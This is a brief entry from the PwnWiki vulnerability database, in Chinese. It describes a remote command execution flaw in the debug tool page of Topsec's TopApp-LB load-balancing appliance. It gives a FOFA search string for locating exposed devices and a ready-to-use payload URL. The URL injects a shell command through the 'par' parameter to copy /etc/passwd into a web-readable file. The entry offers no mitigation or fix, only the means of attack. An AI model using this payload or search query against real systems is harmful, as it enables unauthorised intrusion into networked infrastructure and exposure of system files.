Loading
0

天融信负载均衡TopApp-LB enable tool debug.php 远程命令执行漏洞/zh-cn

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

FOFA

app="天融信-TopApp-LB-负载均衡系统"

Payload

设置var=0,tool=1,再进行命令拼接造成远程命令执行: 

/acc/tools/enable_tool_debug.php?val=0&tool=1&par=127.0.0.1' | cat /etc/passwd > ../../test.txt |'

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库